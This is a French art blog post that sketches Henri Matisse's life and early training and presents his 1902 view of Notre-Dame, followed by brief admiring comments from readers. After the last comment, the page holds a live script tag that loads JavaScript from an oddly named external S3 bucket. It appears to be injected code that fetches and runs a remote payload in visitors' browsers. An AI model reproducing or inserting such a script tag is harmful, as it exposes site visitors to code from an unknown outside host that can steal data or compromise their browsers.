• Le tableau du samedi : Matisse

     

     

     

     

     

     

     

     

     

    Henri Matisse né le 31 décembre 1869 au Cateau-Cambrésis, et mort, le 3 novembre 1954, à Nice, est un peintre, dessinateur, graveur et sculpteur français.

    Figure majeure du XXe siècle, son influence sur l'art de la seconde partie du siècle est considérable par l'utilisation de la simplification, de la stylisation, de la synthèse et de la couleur comme seul sujet de la peinture, aussi bien pour les nombreux peintres figuratifs ou abstraits qui se réclameront de lui et de ses découvertes. Il fut le chef de file du fauvisme.

    De Pablo Picasso, qui fut son ami et le considérait comme son grand rival, à Andy Warhol qui « voulait être Matisse », tous les peintres du XXe siècle ont été confrontés à la gloire et au génie de Matisse.

    Henri Matisse naît le 31 décembre 1869 au Cateau-Cambrésis en France, fils d’un marchand de grains. Sa mère est peintre amateur. Après la guerre franco-allemande, en 1871, la famille déménage à Bohain-en-Vermandois où Matisse passe sa jeunesse. Il commence sa vie professionnelle comme clerc de notaire chez maître Derieux à Saint-Quentin. À 20 ans, à la suite d'une crise d'appendicite, il est contraint de rester alité pendant de longues semaines. Grâce à un voisin et ami peintre amateur, Léon Bouvier, Matisse découvre le plaisir de peindre. Sa mère lui offre une boîte de peinture. Il réalise ses premières œuvres, plus particulièrement un Chalet suisse, chromo reproduit dans les boîtes de peinture en vente à l'époque, dont Henri Matisse peindra une copie, qu'il signera « Essitam ».

    Dès son rétablissement, tout en réintégrant l'étude, il s'inscrit au cours de dessin de l'école Quentin-de-La Tour destinée aux dessinateurs en textile de l'industrie locale.

    Il peint son premier tableau, Nature morte avec des livres, en juin 1890.

    Peu après, il se rend à Paris. En 1892, Matisse rencontre Albert Marquet à l'École des Arts déco puis s'inscrit en 1895, à l'École des beaux-arts, dans l'atelier de Gustave Moreau. L'enseignement du maître encourage ses élèves à penser leur peinture, à la rêver, au-delà de la virtuosité technique. Matisse, comme ses condisciples, Georges Rouault, Léon Lehmann, Simon Bussy, Eugène Martel, Albert Huyot ou Henri Evenepoel, est stimulé par cette conception de la peinture et entend développer la sienne selon son individualité. Gustave Moreau, lors d'une correction, lui dit : « Vous allez simplifier la peinture. »

    Cette prophétie peut être considérée comme le programme esthétique de l'œuvre d'Henri Matisse.

    En 1896, Matisse expose pour la première fois au Salon des Cent et au Salon de la Société nationale des beaux-arts, dont il devient membre associé sur proposition de Pierre Puvis de Chavannes. Cette fonction lui permet notamment d'exposer sans passer par un jury. Il passe l'été à Belle-Île-en-Mer et rencontre l'Australien John Peter Russell, qui l'introduit auprès d'Auguste Rodin et Camille Pissarro. Il commence à s'intéresser à la peinture impressionniste qu'il découvre en 1897 au musée du Luxembourg. Il est alors un peintre classique de natures mortes réalistes aux textures amples. Pour gagner sa vie, Matisse et Marquet travaillent comme peintre décorateurs à la journée, pour les décorateurs de théâtre.

     

     A Glimpse of Notre-Dame in the Late Afternoon, 1902 - Henri Matisse

     Glimpse of Notre-Dame in the Late Afternoon

    Henri Matisse

  • Commentaires

    1
    Samedi 12 Octobre à 09:57
    eMmA MessanA

    Un Maître...

    2
    Samedi 12 Octobre à 10:02
    LADY MARIANNE

    très simplifié en effet-
    merci pour les explications- un maitre en la matière-
    merci-
    bon samedi-

    3
    Samedi 12 Octobre à 10:16

    J'aime beaucoup Gazou. Merci pour les commentaires.

    Bises et bon weekend

    4
    Samedi 12 Octobre à 10:38

    Ce tableau me plaît beaucoup.

    Je ne le connaissais pas.

    Bisous et douce journée.

    5
    Samedi 12 Octobre à 11:17

    Matisse est pour moi avec Van Gogh , son opposé, l'un des plus grands peintres "modernes"

    6
    Samedi 12 Octobre à 12:17

    J'aime bien Matisse, bien que les prémices de "l'art moderne" se fassent déjà sentir chez lui.

    7
    Samedi 12 Octobre à 15:16

    en voilà un que je connais et que j'apprécie !!! bien que tes informations aient complété d'allure mes connaissances ...

    amitié .

    8
    Samedi 12 Octobre à 16:10
    Renée

    Pas quelque chose que je verrais chez moi! Bises

    9
    Samedi 12 Octobre à 17:04

    Intéressant ce tableau de Matisse, peu connu, surtout quand comme moi, on fait de la photo et de la peinture. Le cadrage est étrange avec cet encadrement incertain, fenêtre ou autre ? Mais c'est le choix de l'artiste et l'exemple des grands (Matisse est l'un des plus grands) nous montre que l'on peut rester libre de ses choix. Merci pour ce choix.

    10
    Samedi 12 Octobre à 18:35

    Une découverte... C'est un tableau que je trouve étrangement trop simplifié...

    Bisous Gazou

    11
    Samedi 12 Octobre à 18:50

    la cathédrale est une masse statique et les personnages donnent vie au tableau. J'aimais beaucoup. Bises

    12
    Samedi 12 Octobre à 21:46
    erato:

    Une peinture bien simplifiée , un artiste qui est un maitre!

    Belle soirée Gazou

    13
    Dimanche 13 Octobre à 19:20

    On croirait que Notre-Dame a été emballée par Christo !

    On n'y voit que du bleu : normal, c'est un Matisse !

    Je ne connaissais pas cette oeuvre, merci Gazou !

    14
    Evy
    Lundi 14 Octobre à 14:02

    Tout bleu c'est beau bonne journée bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :